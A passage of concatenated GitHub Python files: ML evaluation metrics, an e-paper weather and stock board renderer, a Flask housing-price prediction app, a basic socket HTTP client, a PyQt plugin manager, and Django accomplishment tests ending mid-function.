+{"seq_id":"70674562919","text":"from sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import auc\nimport math\nimport numpy as np\n\n\ndef get_confusion_matrix(y_true, y_pred) -> tuple:\n \"\"\"\n Returns tp, tn, fp, fn\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: (tp, tn, fp, fn)\n \"\"\"\n tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()\n return tp, tn, fp, fn\n\n\ndef get_accuracy(y_true, y_pred) -> float:\n \"\"\"\n Returns the accuracy score\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: Accuracy score\n \"\"\"\n # We need to cast to np.array so that .shape exists\n if isinstance(y_true, list):\n y_true = np.array(y_true)\n if isinstance(y_pred, list):\n y_pred = np.array(y_pred)\n\n if len(y_true.shape) > 1:\n y_true = y_true.argmax(axis=1)\n if len(y_pred.shape) > 1:\n y_pred = y_pred.argmax(axis=1)\n\n return accuracy_score(y_true, y_pred)\n\n\ndef get_f1_score(y_true, y_pred) -> float:\n \"\"\"\n Returns the F-1 score\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: F-1 score\n \"\"\"\n if len(np.unique(y_true)) > 2:\n average = None\n else:\n average = 'binary'\n return f1_score(y_true, y_pred, average=average)\n\n\ndef get_recall(y_true, y_pred) -> float:\n \"\"\"\n Returns the recall score\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: Recall score\n \"\"\"\n if len(np.unique(y_true)) > 2:\n average = None\n else:\n average = 'binary'\n return recall_score(y_true, y_pred, average=average)\n\n\ndef 
get_precision(y_true, y_pred) -> float:\n \"\"\"\n Returns the precision.\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: Precision\n \"\"\"\n if len(np.unique(y_true)) > 2:\n average = None\n else:\n average = 'binary'\n return precision_score(y_true, y_pred, average=average)\n\n\ndef get_pf(y_true, y_pred) -> float:\n \"\"\"\n Returns the false alarm rate\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: False alarm rate\n \"\"\"\n _, tn, fp, fn = get_confusion_matrix(y_true, y_pred)\n return 1. * fp / (fp + tn) if fp + tn != 0 else 0\n\n\ndef get_pd_pf(y_true, y_pred) -> float:\n \"\"\"\n Returns the value of recall - false alarm rate.\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: Recall - false alarm rate\n \"\"\"\n return get_recall(y_true, y_pred) - get_pf(y_true, y_pred)\n\n\ndef get_roc_auc(y_true, y_pred) -> float:\n \"\"\"\n Returns the area under the pd/pf curve\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: AUC score\n \"\"\"\n return roc_auc_score(y_true, y_pred)\n\n\ndef get_d2h(y_true, y_pred) -> float:\n \"\"\"\n Returns the distance to heaven metric\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: d2h score\n \"\"\"\n return 1. / math.sqrt(2) - math.sqrt(get_pf(y_true, y_pred) ** 2 + (1. - get_recall(y_true, y_pred)) ** 2) / math.sqrt(2)\n\n\ndef get_d2h2(y_true, y_pred) -> float:\n \"\"\"\n Returns the distance to heaven metric\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: d2h score\n \"\"\"\n return 1. / math.sqrt(2) - math.sqrt(2.*get_pf(y_true, y_pred) ** 2 + (1. - get_recall(y_true, y_pred)) ** 2) / math.sqrt(2)\n\n\ndef get_ifa(y_true, y_pred) -> float:\n ifa = 0\n actual_results = np.asarray(y_true)\n predicted_results = np.asarray(y_pred)\n index = 0\n for i, j in zip(actual_results, predicted_results):\n if ((i == \"yes\") and (j == \"yes\")) or ((i == 1) and (j == 0)):\n break\n elif ((i == \"no\") and (j == \"yes\")) or ((i == 0) and (j == 1)):\n ifa += 1\n index += 1\n return ifa\n\n\ndef get_g1_score(y_true, y_pred) -> float:\n \"\"\"\n Returns the G-1 score\n\n :param y_true: True labels\n :param y_pred: Predictions\n :return: G-1 score\n \"\"\"\n tp, tn, fp, fn = get_confusion_matrix(y_true, y_pred)\n pf = 1. * fp / (fp + tn) if fp + tn != 0 else 0\n recall = 1. * tp / (tp+fn) if tp + fn != 0 else 0\n g_score = (2 * recall * (1 - pf)) / (recall + 1 - pf) if recall + 1 - pf != 0 else 0\n return g_score\n\n\ndef get_popt20(data) -> float:\n \"\"\"\n Get popt20 score.\n\n :param data: Pandas DataFrame with data. 
Must contain columns \"bug\", \"loc\", and \"prediction\".\n :return: popt20 score\n \"\"\"\n def subtotal(x):\n xx = [0]\n for _, t in enumerate(x):\n xx += [xx[-1] + t]\n return xx[1:]\n\n def get_recall_(true):\n total_true = float(len([i for i in true if i == 1]))\n hit = 0.0\n recall = []\n for i, el in enumerate(true):\n if el == 1:\n hit += 1\n recall += [hit / total_true if total_true else 0.0]\n return recall\n\n data.sort_values(by=[\"bug\", \"loc\"], inplace=True)\n x_sum = float(sum(data['loc']))\n x = data['loc'].apply(lambda t: t / x_sum)\n xx = subtotal(x)\n\n # get AUC_optimal\n yy = get_recall_(data['bug'].values)\n xxx = [i for i in xx if i <= 0.2]\n yyy = yy[:len(xxx)]\n try:\n s_opt = round(auc(xxx, yyy), 3)\n except ValueError:\n s_opt = 0\n\n # get AUC_worst\n xx = subtotal(x[::-1])\n yy = get_recall_(data['bug'][::-1].values)\n xxx = [i for i in xx if i <= 0.2]\n yyy = yy[:len(xxx)]\n try:\n s_wst = round(auc(xxx, yyy), 3)\n except:\n s_wst = 0\n\n # get AUC_prediction\n data.sort_values(by=[\"prediction\", \"loc\"], ascending=[0, 1], inplace=True)\n x = data['loc'].apply(lambda t: t / x_sum)\n xx = subtotal(x)\n yy = get_recall_(data['bug'].values)\n xxx = [k for k in xx if k <= 0.2]\n yyy = yy[:len(xxx)]\n try:\n s_m = round(auc(xxx, yyy), 3)\n except ValueError:\n return 0\n\n popt = (s_m - s_wst) / (s_opt - s_wst)\n return round(popt, 3)\n","repo_name":"yrahul3910/raise","sub_path":"raise_utils/metrics/impl.py","file_name":"impl.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"22284175474","text":"#!/usr/bin/env python\n#encoding: utf-8\nimport sys\nimport os\nimport time\nimport datetime\nimport json\nimport requests\nimport re\nimport struct\nfrom StringIO import StringIO\nfrom PIL import Image, ImageDraw, ImageFont\n\ncolor_white = (255, 255, 255)\ncolor_black = (0, 0, 0)\ncolor_red = (227, 178, 4)\n\nimage_width = 640\nimage_height = 384\n\nfont_path = os.path.dirname(os.path.abspath(__file__)) + '/font.ttc'\n\ndef current_datetime():\n m = ['一', '二', '三', '四', '五', '六', '日']\n n = datetime.datetime.now()\n return (n.strftime('%m-%d %H:%M 星期') + m[n.weekday()]).decode('utf-8')\n\ndef fetch_finance():\n url = 'https://hq.sinajs.cn/rn=%d&list=gb_dji,gb_ixic,gb_inx,s_sh000001,s_sz399001,USDCNY' % int(time.time())\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',\n }\n r = requests.get(url, headers=headers)\n text = r.text\n matches = re.findall(r'var ([^=]+)=\"([^\"]+)\"', text, re.M)\n\n result = {}\n for v in matches:\n result[v[0]] = v[1].split(',')\n\n return result\n\ndef draw_finance(draw, item, pos):\n font = ImageFont.truetype(font_path, 20)\n\n left = pos[0]\n top = pos[1] + 10\n text = item[0]\n draw.text((left, top), text, font=font, fill=color_black)\n w, h = draw.textsize(text, font=font)\n w2, h2 = draw.textsize(u'四个字符', font=font)\n if w < w2:\n w = w2\n\n left += w + 10\n text = u'%.2f' % item[1]\n w, h = draw.textsize(text, font=font)\n draw.text((left, top), text, font=font, fill=color_black)\n\n bg_color = None\n txt_color = None\n left += w + 10\n\n if item[2] > 0:\n bg_color = color_red\n txt_color = color_black\n text = u'+%.2f%%' % item[2]\n else:\n bg_color = color_black\n txt_color = color_white\n text = u'%.2f%%' % item[2]\n\n w, h = draw.textsize(text, font=font)\n draw.rectangle([left-2, top-2, left + w + 2, top + h + 2], 
fill=bg_color)\n draw.text((left, top), text, font=font, fill=txt_color)\n\ndef load_icon(url):\n r = requests.get(url)\n png = Image.open(StringIO(r.content))\n background = Image.new(\"RGB\", png.size, (255, 255, 255))\n background.paste(png, mask=png.split()[3]) # 3 is the alpha channel\n return background\n\ndef draw_weather(image, draw, day, pos, width):\n is_today = datetime.datetime.now().strftime('%m-%d') == day['date']\n\n font = ImageFont.truetype(font_path, 24)\n\n left = pos[0]\n top = pos[1] + 10\n text = day['date']\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n top += h + 5\n text = day['weekday']\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n top += h + 5\n if is_today:\n icon = load_icon(day['day']['icon'])\n icon_margin = (width - icon.size[0])/2\n image.paste(icon, (icon_margin + left, top))\n else:\n icon = load_icon(day['day']['icon'])\n icon_margin = width/2 - icon.size[0] - 10\n image.paste(icon, (icon_margin + left, top))\n\n icon = load_icon(day['night']['icon'])\n image.paste(icon, (left + width/2 + 10, top))\n\n font = ImageFont.truetype(font_path, 20)\n text = day['day']['temp'] + u'℃'\n if not is_today:\n text += ' / ' + day['night']['temp'] + u'℃'\n top += h + 30\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n font = ImageFont.truetype(font_path, 16)\n text = day['wind']\n top += h + 5\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n font = ImageFont.truetype(font_path, 24)\n text = day['aq'] + u' ' + day['aq_desc']\n top += h + 5\n w, h = draw.textsize(text, font=font)\n draw.text(((width-w)/2 + left, top), text, font=font, fill=color_black)\n\n\ndef draw_board():\n image = Image.new('RGB', (image_width, image_height), color_white)\n draw = ImageDraw.Draw(image)\n\n font = ImageFont.truetype(font_path, 60)\n\n line = current_datetime()\n w, h = draw.textsize(line, font=font)\n draw.text(((image_width-w)/2,10), line, font=font, fill=color_black)\n\n draw.line([(0, 80),(image_width, 80)], fill=color_black, width=1)\n\n json_path = os.path.dirname(os.path.abspath(__file__)) + '/weather.json'\n weather_info = json.load(open(json_path))\n weather_info['days'][0]['day']['temp'] = weather_info['current_temp']\n weather_info['days'][0]['wind'] = weather_info['current_wind']\n weather_info['days'][0]['aq'] = weather_info['current_aq']\n weather_info['days'][0]['aq_desc'] = weather_info['current_aq_desc']\n\n for i in xrange(4):\n width = image_width / 4\n draw_weather(image, draw, weather_info['days'][i], (0 + i * width, 80), width)\n if i != 3:\n draw.line([((i+1)*width, 80),((i+1)*width, 80+200)], fill=color_black, width=1)\n\n draw.line([(0, 80+200),(image_width, 80+200)], fill=color_black, width=1)\n\n finance = fetch_finance()\n draw_finance(draw, (u'道琼斯', float(finance['hq_str_gb_dji'][1]), float(finance['hq_str_gb_dji'][2])), (20, 280))\n draw_finance(draw, (u'纳斯达克', float(finance['hq_str_gb_ixic'][1]), float(finance['hq_str_gb_ixic'][2])), (image_width/2, 280))\n\n draw_finance(draw, (u'上证指数', float(finance['hq_str_s_sh000001'][1]), float(finance['hq_str_s_sh000001'][3])), (20, 310))\n draw_finance(draw, (u'深证成指', float(finance['hq_str_s_sz399001'][1]), float(finance['hq_str_s_sz399001'][3])), (image_width/2, 310))\n\n c = float(finance['hq_str_USDCNY'][8])\n o = 
float(finance['hq_str_USDCNY'][3])\n    draw_finance(draw, (u'美元兑人民币', c, (c-o)/o*100), (20, 340))\n\n    return image\n\ndef convert_image(im, output_path):\n    output_fp = open(output_path, \"w\")\n\n    w, h = im.size\n    size = w*h\n\n    i = 0\n    while i < size:\n        b = 0x00\n\n        for j in xrange(4):\n            idx = i + j\n            if idx < size:\n                px = im.getpixel((idx%w, idx/w))\n                if px[0] > 230 and px[1] > 230 and px[2] > 230: #white\n                    b |= 0x01 << ((3 - j)*2)\n                elif px[0] > 200:\n                    b |= 0x02 << ((3 - j)*2)\n                else:\n                    pass  # black pixel: leave both bits 0; breaking here would wrongly blacken the rest of the 4-pixel group\n\n        output_fp.write(struct.pack(\"B\", b))\n\n        i += 4\n\n\n\nif __name__ == '__main__':\n    image = draw_board()\n    #image.save(\"./board.bmp\")\n    convert_image(image, sys.argv[1])\n","repo_name":"emptyhua/epaper_board","sub_path":"draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":6573,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"}
+{"seq_id":"35834921429","text":"import os\n\nfrom dotenv import load_dotenv\n\nfrom bot_app import screenshots\n\ndotenv_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), '.env')\n\nif os.path.exists(dotenv_path):\n    load_dotenv(dotenv_path)\n\nBOT_TOKEN = os.environ.get('BOT_TOKEN', '')\n\nSPLASH_PORT = os.environ.get('SPLASH_PORT', '8050')\n\nSAVE_PATH = screenshots.get_dir_path()\n\nFULL_PAGE = 1\n","repo_name":"Iftor/screenshoter-bot","sub_path":"bot_app/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"538702366","text":"# Importing the libraries\nfrom flask import Flask, request, render_template\nfrom flask_restful import Api\nfrom joblib import load\n\n# Initializing Flask and specifying the templates directory\napp = Flask(__name__, template_folder=\"template\")\n\nimport preprocessamento\n\n# Initializing the API\napi = Api(app)\n\n# Loading the trained models\nmodelo_aluguel = load('modelo_alugueis.joblib')\nmodelo_venda = load('modelo_vendas.joblib')\n\n# Default route for the home page\n@app.route('/')\ndef home():\n    return render_template('home.html') # Render the template\n\n# The 'predict' route accepts GET requests\n@app.route('/predict', methods=['GET'])\ndef predict_price():\n    try:\n        negotiation_type = int(request.args.get('negotiation_type')) # Get the Negotiation_Type parameter\n        condo = int(request.args.get('condo')) # Get the Condo parameter\n        size = int(request.args.get('size')) # Get the Size parameter\n        rooms = int(request.args.get('rooms')) # Get the Rooms parameter\n        toilets = int(request.args.get('toilets')) # Get the Toilets parameter\n        suites = int(request.args.get('suites')) # Get the Suites parameter\n        parking = int(request.args.get('parking')) # Get the Parking parameter\n        elevator = int(request.args.get('elevator')) # Get the Elevator parameter\n        furnished = int(request.args.get('furnished')) # Get the Furnished parameter\n        swimming_pool = int(request.args.get('swimming_pool')) # Get the Swimming_Pool parameter\n        new = int(request.args.get('new')) # Get the New parameter\n        bairro = request.args.get('bairro') # Get the Bairro parameter\n\n        bairros_sem_aluguel = ['District_Perus', 'District_São Domingos']\n\n        # Choosing between the rental and sale models\n        if negotiation_type == 0:\n            if bairro in bairros_sem_aluguel:\n                previsao = 'O bairro informado não possui nenhuma informação no banco de dados referente ao preço de ' \\\n                           'aluguel.'\n                return render_template('output2.html', previsao=previsao)\n            else:\n                # Compute the prediction\n                previsao = modelo_aluguel.predict(preprocessamento.tratamento(negotiation_type, condo, size, rooms,\n                                                                              toilets, suites, parking, elevator,\n                                                                              furnished, swimming_pool, new, bairro))\n                # Display the prediction on the output web page\n                return render_template('output.html', previsao=previsao)\n\n        elif negotiation_type == 1:\n            # Compute the prediction\n            previsao = round(modelo_venda.predict(preprocessamento.tratamento(negotiation_type, condo, size, rooms,\n                                                                              toilets, suites, parking, elevator,\n                                                                              furnished, swimming_pool, new, bairro)))\n            # Display the prediction on the output web page\n            return render_template('output.html', previsao=previsao)\n    except Exception:\n        return 'Error'  # return a marker instead of silently evaluating a bare string\n\n# Run the Flask server\nif __name__ == '__main__':\n    app.run()\n","repo_name":"octavianosilva/API_Apartamentos_SP","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"34838305943","text":"\"\"\" A simple web browser \"\"\"\r\n\r\nimport socket\r\n# print(help(socket))\r\n\r\nmy_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nmy_sock.connect((\"data.pr4e.org\", 80))\r\n\r\nreq = \"GET http://data.pr4e.org/romeo.txt HTTP/1.0\\r\\n\\r\\n\"\r\nreq_encoded = req.encode()\r\nmy_sock.send(req_encoded)\r\n\r\nwhile True:\r\n    data = my_sock.recv(512)\r\n    if len(data) < 1:\r\n        break\r\n    print(data.decode())\r\n\r\nmy_sock.close()\r\n","repo_name":"danielOuattara/Python_For_EveryBody_py4e_Charles_Severance","sub_path":"13_Python_Network/script_03_using_http.py","file_name":"script_03_using_http.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"31849950045","text":"import os\nimport shutil\nimport sys\n\nfrom PyQt6 import QtWidgets, QtGui, QtCore\nfrom pathlib import Path\nfrom .control_plugin_collection import PluginCollection\n\n\nclass PluginManager(object):\n    def __init__(self, main_control):\n        super().__init__()\n        self.main_control = main_control\n        self.plugin = PluginCollection(\"plugins\")\n        self.apps_activated = None\n        self.index = None\n        self.init_available_plugin()\n        self.connect_to_event()\n\n    def connect_to_event(self):\n        self.main_control.ui.add_plugins_button.clicked.connect(self.install_new_plugin)\n        self.main_control.ui.delete_plugins_button.clicked.connect(self.action_delete_apps)\n        self.main_control.ui.close_plugin_button.clicked.connect(self.main_control.back_to_home)\n        self.main_control.ui.help_plugins_button.clicked.connect(self.help_menu_plugin)\n\n    def init_available_plugin(self):\n        for i in range(self.main_control.ui.layout_application.count()):\n            self.main_control.ui.layout_application.itemAt(i).widget().close()\n\n        for i in range(len(self.plugin.name_application)):\n            icon = self.plugin.get_icon_(i)\n            button = self.add_btn_apps_plugin(icon, self.plugin.name_application[i])\n            button.clicked.connect(self.open_plugin_apps)\n            self.main_control.ui.layout_application.addWidget(button)\n\n    def install_new_plugin(self):\n        options = QtWidgets.QFileDialog.Option.DontUseNativeDialog\n        dir_plugin = QtWidgets.QFileDialog.getExistingDirectory(None,\n                                                                'Select Application Folder', \"../plugin_store\", options)\n        if dir_plugin:\n            original = dir_plugin\n            name_plug = os.path.basename(os.path.normpath(original))\n            path_file = os.path.dirname(os.path.realpath(__file__))\n            target = path_file + '/plugins/'\n            name_exist 
= Path(target + name_plug)\n if name_exist.exists():\n QtWidgets.QMessageBox.warning(None, \"Warning !!\", \"Plugins already exist!!\")\n else:\n listApp = self.plugin.name_application\n self.main_control.model.copy_directory(original, target)\n self.plugin.reload_plugins()\n newList = self.plugin.name_application\n name = [item for item in newList if item not in listApp]\n\n def listToString(listIn):\n return \" \".join(listIn)\n\n index = newList.index(listToString(name))\n icon = self.plugin.get_icon_(index)\n button = self.add_btn_apps_plugin(icon, self.plugin.name_application[index])\n button.clicked.connect(self.open_plugin_apps)\n self.main_control.ui.layout_application.addWidget(button)\n self.pop_up_message_box(\"Plugins was successfully added!!\")\n\n def refresh_theme_widget(self):\n if self.index is not None:\n self.plugin.change_theme(self.index)\n\n def open_plugin_apps(self):\n button = self.main_control.sender()\n index = self.plugin.name_application.index(button.objectName())\n if index != self.index:\n self.index = self.plugin.name_application.index(button.objectName())\n self.main_control.ui.delete_plugins_button.show()\n self.main_control.ui.close_plugin_button.show()\n for i in range(self.main_control.ui.layout_plugin.count()):\n self.main_control.ui.layout_plugin.itemAt(i).widget().close()\n\n widget = self.plugin.get_widget(self.index, self.main_control.model)\n self.main_control.ui.layout_plugin.addWidget(widget)\n self.main_control.ui.widget_container_content.setCurrentIndex(1)\n self.main_control.ui.frame_btn_moilapp.hide()\n self.main_control.ui.frame_button_view.hide()\n self.apps_activated = button.objectName()\n\n @classmethod\n def add_btn_apps_plugin(cls, icon_, name):\n button = QtWidgets.QPushButton()\n button.setObjectName(name)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Policy.Minimum, QtWidgets.QSizePolicy.Policy.Expanding)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(button.sizePolicy().hasHeightForWidth())\n button.setSizePolicy(sizePolicy)\n button.setMinimumSize(QtCore.QSize(40, 25))\n button.setMaximumSize(QtCore.QSize(35, 16777215))\n if icon_ is not None:\n icon = QtGui.QIcon(icon_)\n button.setIcon(icon)\n button.setIconSize(QtCore.QSize(30, 30))\n return button\n\n def action_delete_apps(self):\n index = self.plugin.name_application.index(self.apps_activated)\n self.delete_apps(index)\n\n def delete_apps(self, index):\n \"\"\"\n Delete selected application from the list.\n\n Returns:\n None.\n \"\"\"\n name = self.plugin.name_application[index]\n path = self.plugin.path_folder[index]\n path = path.split(\".\")[1]\n\n path_file = os.path.dirname(os.path.realpath(__file__))\n path = path_file + '/plugins/'+path\n\n reply = QtWidgets.QMessageBox.question(None, 'Message',\n \"Are you sure want to delete \\n\" +\n name + \" application ?\\n\",\n QtWidgets.QMessageBox.StandardButton.Yes |\n QtWidgets.QMessageBox.StandardButton.No,\n QtWidgets.QMessageBox.StandardButton.No)\n\n if reply == QtWidgets.QMessageBox.StandardButton.Yes:\n shutil.rmtree(path, ignore_errors=True)\n self.plugin.reload_plugins()\n self.init_available_plugin()\n self.pop_up_message_box(\"Plugins was successfully deleted !!\")\n self.main_control.back_to_home()\n\n def help_menu_plugin(self):\n if self.main_control.ui.widget_container_content.currentIndex() == 0:\n message = \"Help menu plugin under development \\n\" \\\n \"we Will inform you after finish!!\\n\"\n\n else:\n 
print(self.plugin.get_description(self.index))\n message = \"Help menu plugin under development \\n\" \\\n \"we Will inform you after finish!!\\n\\n\" \\\n \"Note App: \" + self.plugin.get_description(self.index)\n self.pop_up_message_box(message)\n\n @classmethod\n def pop_up_message_box(cls, message=\"\"):\n msg = QtWidgets.QMessageBox()\n msg.setIcon(QtWidgets.QMessageBox.Icon.Information)\n msg.setStyleSheet(\"font-family: Segoe UI; font-size:14px;\")\n msg.setWindowTitle(\"Information\")\n # setting message for Message Box\n msg.setText(\"Information !! \\n\\n\" + message)\n msg.setStandardButtons(QtWidgets.QMessageBox.StandardButton.Ok)\n msg.show()\n\n def close_msg():\n msg.done(0)\n\n QtCore.QTimer.singleShot(6000, close_msg)\n","repo_name":"Herusyahputra/PycharmProjects","sub_path":"moilapp-develop_anto/src/controllers/control_plugin_manager.py","file_name":"control_plugin_manager.py","file_ext":"py","file_size_in_byte":7154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32523824634","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom mixer.backend.django import mixer\nimport json\nfrom accomplishment.forms import AccomplishmentFormMixin\nfrom accomplishment.models import Accomplishment, UserAccomplishment\nfrom django.urls import reverse_lazy\nfrom subject_area.models import SubjectArea, Category\nfrom rest_framework.authtoken.models import Token\n\n\nclass AccomplishmentTestCase(TestCase):\n def setUp(self):\n self.session_user = mixer.blend(User)\n self.client.force_login(self.session_user)\n self.token = Token.objects.create(user=self.session_user).key\n self.client.defaults['HTTP_AUTHORIZATION'] = 'Token ' + self.token\n profile = self.session_user.profile\n profile.device_token = \"somedevicetoken\"\n profile.save()\n\n def test_accomplishment_creation(self):\n accomplishments_count = Accomplishment.objects.count()\n subject_areas = [instance for instance in mixer.cycle(2).blend(SubjectArea)]\n categories = [instance for instance in mixer.cycle(2).blend(Category)]\n\n category_ids = [category.id for category in categories]\n\n subject_areas[0].category_set.add(categories[0])\n subject_areas[1].category_set.add(categories[1])\n\n users = mixer.cycle(2).blend(User)\n\n i = 0\n\n for user in users:\n print(f\"whaaat: {subject_areas[i].id}\")\n user.profile.subject_area = subject_areas[i]\n user.save()\n user.profile.save()\n i += 1\n\n print(f\"hey 2: {user.profile.subject_area}\")\n\n with mixer.ctx(commit=False):\n data = mixer.blend(Accomplishment, name=\"test\", full_score=100).__dict__\n data = {**data, \"categories\": category_ids}\n\n response = self.client.post(reverse_lazy(\"accomplishment:list\"), data)\n print(response.content)\n\n accomplishment = Accomplishment.objects.first()\n\n print(f\"yeso: {SubjectArea.objects.all()}\")\n print(f\"yeso 2: {Category.objects.all()}\")\n print(f\"yeso 3: {User.objects.all()}\")\n print(f\"yeso 4: {UserAccomplishment.objects.all()}\")\n\n self.assertEqual(response.status_code, 302)\n self.assertEqual(Accomplishment.objects.count(), accomplishments_count+1)\n self.assertEqual(len(users), accomplishment.users.all().count())\n # self.assertEqual(len(subject_areas), accomplishment.subject_areas.all().count())\n\n users_after_accomplishment_creation = mixer.cycle(2).blend(User)\n\n subject_area_after_accomplishment_creation = mixer.blend(SubjectArea)\n\n category_after_accomplishment_creation = mixer.blend(\n Category, 
subject_area=subject_area_after_accomplishment_creation)\n\n accomplishment.categories.add(category_after_accomplishment_creation)\n\n i = 0\n for user in users_after_accomplishment_creation:\n user.profile.subject_area = subject_area_after_accomplishment_creation\n user.save()\n i += 1\n\n accomplishment.refresh_from_db()\n\n self.assertEqual(len(users)+len(users_after_accomplishment_creation), accomplishment.users.all().count())\n\n def test_accomplishment_edition(self):\n full_score = 3\n instance = self.create_accomplishment(full_score=full_score)\n subject_areas = instance.subject_areas.all()\n categories = instance.categories.all()\n accomplishment_users = set(instance.users.values_list(\"pk\", flat=True))\n\n with mixer.ctx(commit=False):\n new_data = mixer.blend(Accomplishment).__dict__\n new_data = {**new_data, \"categories\": [category.pk for category in categories]}\n\n response = self.client.post(reverse_lazy(\"accomplishment:edit\", kwargs={\"pk\": instance.pk}), data=new_data)\n self.assertEqual(response.status_code, 302)\n\n instance.refresh_from_db()\n\n self.assertEqual(instance.name, new_data.get(\"name\"))\n self.assertEqual(instance.categories.all().count(), categories.count())\n self.assertEqual(set(instance.users.values_list(\"pk\", flat=True)), accomplishment_users)\n\n # test changing of subject_areas\n\n new_subject_areas = [subject_area for subject_area in mixer.cycle(3).blend(SubjectArea)]\n\n i = 0\n\n new_categories = [category for category in mixer.cycle(3).blend(Category)]\n\n for new_subject_area in new_subject_areas:\n new_categories[i].subject_area = new_subject_area\n new_categories[i].save()\n\n new_data[\"categories\"] = [new_category.pk for new_category in new_categories]\n\n new_users = mixer.cycle(3).blend(User)\n\n i = 0\n for user in new_users:\n user.profile.subject_area = new_subject_areas[i]\n user.save()\n user.profile.save()\n i += 1\n\n response = self.client.post(reverse_lazy(\"accomplishment:edit\", kwargs={\"pk\": instance.pk}), data=new_data)\n self.assertEqual(response.status_code, 302)\n print(f\"?????? 
{accomplishment_users}\")\n        old_user = next(iter(accomplishment_users))\n        response = self.client.get(reverse_lazy(\"api_accomplishment:accomplishment-detail\",\n                                                kwargs={\"accomplishment_id\": instance.pk,\n                                                        \"user_id\": old_user}))\n\n        # the user must no longer show up here, since they no longer belong to the subject area\n\n        self.assertEqual(response.status_code, 404, f\"{json.loads(response.content)}\")\n\n        instance.refresh_from_db()\n\n        self.assertEqual(len(new_subject_areas), SubjectArea.objects.filter(\n            category__in=instance.categories.all()).count())\n        self.assertNotEqual(set(instance.users.values_list(\"pk\", flat=True)), accomplishment_users)\n\n        # example user must be user from subject_area because non-subject-areas aren't listed on endpoint\n\n        example_user = instance.categories.first().subject_area.profiles.first().user\n\n        for i in range(0, full_score):\n            response = self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-incrementation\",\n                                                    kwargs={\"user_id\": example_user.id, \"accomplishment_id\": instance.id})\n                                       )\n            self.assertEqual(response.status_code, 200)\n\n        self.assertEqual(response.status_code, 200)\n        self.assertEqual(json.loads(response.content).get(\"score\"), full_score)\n        instance.refresh_from_db()\n\n        new_full_score = 1\n        new_data[\"full_score\"] = new_full_score\n\n        response = self.client.post(reverse_lazy(\"accomplishment:edit\", kwargs={\"pk\": instance.pk}), data=new_data)\n\n        self.assertEqual(response.status_code, 302)\n\n        instance.refresh_from_db()\n\n        self.assertEqual(instance.full_score, new_full_score)\n\n    def test_incrementation_and_decrementation_of_users_accomplishment_score(self):\n        full_score = 3\n        accomplishment = self.create_accomplishment(full_score=full_score)\n        user = accomplishment.users.first()\n\n        response, json_response = self.fetch_user_accomplishment(user.id, accomplishment.id)\n\n        self.assertEqual(response.status_code, 200)\n        self.assertEqual(json_response.get(\"score\"), 0)\n\n        for i in range(0, full_score):\n            self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-incrementation\",\n                                         kwargs={\"user_id\": user.id, \"accomplishment_id\": accomplishment.id})\n                            )\n        response, json_response = self.fetch_user_accomplishment(user.id, accomplishment.id)\n        self.assertEqual(response.status_code, 200)\n        self.assertEqual(json_response.get(\"score\"), full_score)\n\n        response = self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-incrementation\",\n                                                kwargs={\"user_id\": user.id, \"accomplishment_id\": accomplishment.id})\n                                   )\n\n        self.assertEqual(response.status_code, 400)\n\n        for i in range(0, full_score):\n            self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-decrementation\",\n                                         kwargs={\"user_id\": user.id, \"accomplishment_id\": accomplishment.id})\n                            )\n\n        response, json_response = self.fetch_user_accomplishment(user.id, accomplishment.id)\n\n        self.assertEqual(response.status_code, 200)\n        self.assertEqual(json_response.get(\"score\"), 0)\n\n        response = self.client.put(reverse_lazy(\"api_accomplishment:accomplishment-decrementation\",\n                                                kwargs={\"user_id\": user.id, \"accomplishment_id\": accomplishment.id})\n                                   )\n\n        self.assertEqual(response.status_code, 400)\n\n    def create_accomplishment(self, full_score=1):\n        subject_areas = [instance for instance in mixer.cycle(2).blend(SubjectArea)]\n        categories = [instance for instance in mixer.cycle(2).blend(Category)]\n\n        